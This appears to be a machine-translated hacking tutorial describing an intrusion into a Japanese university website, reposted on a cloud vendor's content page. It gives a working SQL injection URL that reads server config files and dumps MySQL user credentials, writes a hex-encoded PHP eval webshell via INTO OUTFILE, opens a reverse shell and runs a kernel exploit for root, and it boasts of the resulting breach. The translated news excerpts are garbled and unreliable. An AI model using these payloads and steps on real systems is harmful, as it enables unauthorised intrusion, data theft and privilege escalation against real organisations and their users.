Injection + write shell directly and give privilege to root

Source: Internet
Author: User
Tags hp software

Today, I was hard-working in the group, and everyone talked about my sister paper. The group owner said that some of their school's Japanese sister paper came from a Japanese school: Kyoto gay club University http://www.bkjia.com/(alternative site)
I want to get some information from my sister's school, and then he will penetrate YD, and then he will succeed. Then, I sent the injected content to me, grabbed me for zhuangding, and asked me to raise the right. By the way, I wrote a tutorial and sent it out, because the Forum does not have many tutorials on Linux privilege escalation ~~~~
First, the injection point:

The http://www.bkjia.com/chs/news/index. php? I =-1
 
Then you can join the query, guess the field, check the version, check the password, and read the file ....... Various queries. The statement is:
 
Http://www.jp/chs/news/index.php? I =-1 + union + select + 1, @ datadir, 3, load_file ('/etc/httpd/conf/httpd. conf '), 5, group_concat (DISTINCT + user, 0x3a, password, 0x3a, file_priv, 0x3a, host), 7,8 + from + mysql. user // @ datadir is the path of the database file

// Load_file reads the apache configuration file of the website container
// Group_concat reads the MySQL administrator's name and password, whether to allow reading and writing files, and whether to allow logon to a remote computer.
Although the root account password for MySQL is mysql00, the host is localhost and only local login is allowed, so it is of little use.

In addition, the Apache configuration file shows that the server rejects access from non-university ip addresses/admin/and phpMyAdmin, so it is useless even if the administrator account password is disclosed.
 
The above load_file was found to have the permission restrictions on various folders, so it was not allowed to log on to the external school ip address. So I guess the absolute path of the apache configuration file is default, later, we found that it is still the default path.
 
Now that we know the content of the Apache configuration file, we can easily know the physical path of the website. The path is/http/www/koho/
Although the/admin and phpMyAdmin directories are restricted, we can write the shell as long as there is an injection point, because the GPC of php is off, I won't talk about how to judge it as off.
Write a sentence directly:
 

Http://www.jp/chs/news/index.php? I =-1 + union + select + distinct, 0x3c3f2f2a, 3,4, 5, 6, 7, 0x2a2f3f3e + into + outfile + '/http/www/koho/english/engnews_img/aa. php '#
2 // The final # is to close the previous statement
3/* 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E
4 is a sentence <? Php @ eval ($ _ POST ['cmd']);?> HEX Encoding. If you don't understand the HEX Encoding, Google it */
5 // if you select a sentence directly, the into outfile 'path' will prompt that the number of fields is different, so select 1, 2, 3, 4... to execute the injection statement
6 // 0x3c3f2f2a and 0x2a2f3f3e are respectively '<? Php // 'and'?> 'Hex is written to webshell because the values 3, 4, and 5 After select may cause a sentence execution error.
7 // so the final content of aa. php is "<? Php @ eval ($ _ POST ['cmd']);?> <? Php // 3, 4, 5, 6, 7?> "
HEX is actually a HEX Encoding. If you don't know the encoding, search for it. HEX Encoding and conversion tools are available locally.
Through the above injection statement, we get a Trojan:
 
Http://www.bkjia.com/english/engnews_img/aa. php


 

Copy the code and connect it with a kitchen knife. The password is cmd ,:

Upload the trojan and get: http://www.doshisha.ac.jp/english/engnews_img/script.php
Directly use the rebound function in shell to bounce back to the local first, local listening:

Remote server-side forwarding:

Then I checked it in the command prompt line. The current permission is:

After reading the/tmp/folder, I found that the/TMP/permission was disabled, and few servers disabled the folder.

Fortunately, granting permissions to this folder does not require the root user. Execute the authorization statement directly:
 
Chmod + x/tmp/
Copy the code here. The folder in linux is the same as the file, and the command can be executed as the file.

 
1 uname-
2 // In fact, lsb_release-


:

Kernel version: linux mainz1 2.6.28-194. e15
System description: Red Hat Enterprise Linux Server release 5.5 (Tikanga)
After checking the system version, find the corresponding Elevation of Privilege script !~ Then upload it to the/tmp/folder.

Then grant the execution permission
Generally, I upload the c source file and "gcc-o/tmp/Program/tmp/C source code". If gcc is unavailable, it can also be directly uploaded after compilation on other machines, just like this

 
 
Chmod + x/tmp/2.6.18-194

Then execute it directly !~


 

The article ends with the root permission. Additional Remarks
Our server in this school has not changed the data and deleted the data. On the sixth day, the Administrator shut down the website and kicked us, which is very efficient. The announcement after the website is closed is as follows:

Please renew your subscription for a while

In the past few days, I have been reading this article because some Web applications have been written incorrectly.
When the Web browser is used to handle malicious operations, such as malicious attackers, malicious attackers, and malicious attackers
No such problems may occur when you are aware of these problems, or when a third-party machine is connected, such problems may occur,
Now, in this learning formula, we have been using these algorithms, instead of being taken care.
There are too many problems, and there are too many problems.
Large numbers of users cannot be confused. Why? too many requests.
It is still a trivial matter to close the website. As we all know, there are four newspaper groups in Japan. After the website is closed, all the four newspaper companies in Japan have reported this incident. The news links and excerpts are as follows:
Daily News reports: http://mainichi.jp/select/biz/news/20120114k0000e040185000c.html

  1. Comrade Social Security: I am not sure I have reached the upper limit.
  2. Gay social University (Kyoto City) zookeeper (HP) please refer to the following link for more information. HP has changed its personal experience, and the outgoing traffic has been confirmed to allow unauthorized access.
  3. The same university, the University see zookeeper website. In China, please refer to the following documents for more information: zookeeper.
  4. On the 6th day of this month, our university staff were admitted to the United Kingdom university, including regular university student enrollment, and external student enrollment. There are several cases in which personal opinions are stored, such as online marketing, online marketing, and online marketing. Same as the University's external staff, there were two major internal staff members, two senior staff members, two senior staff members, and two senior staff members. [50 TiB and large]

Report by Asahi-Japan News Agency: http://www.asahi.com/digital/internet/OSK201201140064.html

The gay club's leading public opinion is not correct, such as the legal representative of the Communist Party of China, the legal representative of the Communist Party of China, and the legal representative of the Communist Party of China.
Tongzhi Social Security University (Beijing city shangjing district) zookeeper is not correct. There are two major problems in this region, and the formula is as follows) on November 11, the website was released, replacing the easy-to-use version of HP software. On the 6th day, Alibaba Cloud announced that Alibaba Cloud has been using Alibaba Cloud products. At the end of the year, he was eager to seek help from zookeeper in China, and was eager to use the presentation board to report the attack on the attack. when there are too many other users. In the HP Graduate University case, the University Center has a personal experience, which has been written directly to the relevant authorities. Please refer to the following link for more information: upper limit has been reached
I am deeply touched by this. Although a general University in Japan was intruded into, there was no loss, but due to the Japanese media exposure and accountability system, in addition to forcing managers to strengthen security measures, it also caused the original responsibility to lose their jobs.
In stark contrast to this itinerary, the website administrator will not know if the website is stationed for a year without modifying the homepage administrator, and the website administrator will be kicked out by the following hackers.
Even if the home page of a website is changed, the website operator does not pay attention to it, and the Administrator is not responsible. hackers are still free to access the website, such as database theft, Trojan mounting, and page modification.

Summary:
The basic idea of this injection point is to find that the MySQL account is root, the GPC is set to off, And Webshell is directly written in the physical path.
The mechanism of elevation of permission is to listen to the local port, bounce the opposite machine back to mongoshell, then pass the EXP corresponding to the kernel version, compile and run the program, and get the root

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.